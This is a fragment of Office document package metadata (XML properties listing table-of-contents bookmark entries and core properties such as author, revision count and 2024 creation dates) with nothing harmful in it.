      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568206</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1835060</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>32</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568205</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1835060</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>26</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568204</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1835060</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>20</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568203</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1835060</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>14</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568202</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1835060</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>8</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568201</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1835060</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc16156820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ФЕРАТ</dc:title>
  <dc:subject/>
  <dc:creator>Cheryaev</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sancho Santiago</cp:lastModifiedBy>
  <cp:revision>57</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-18T08:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-12T15:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>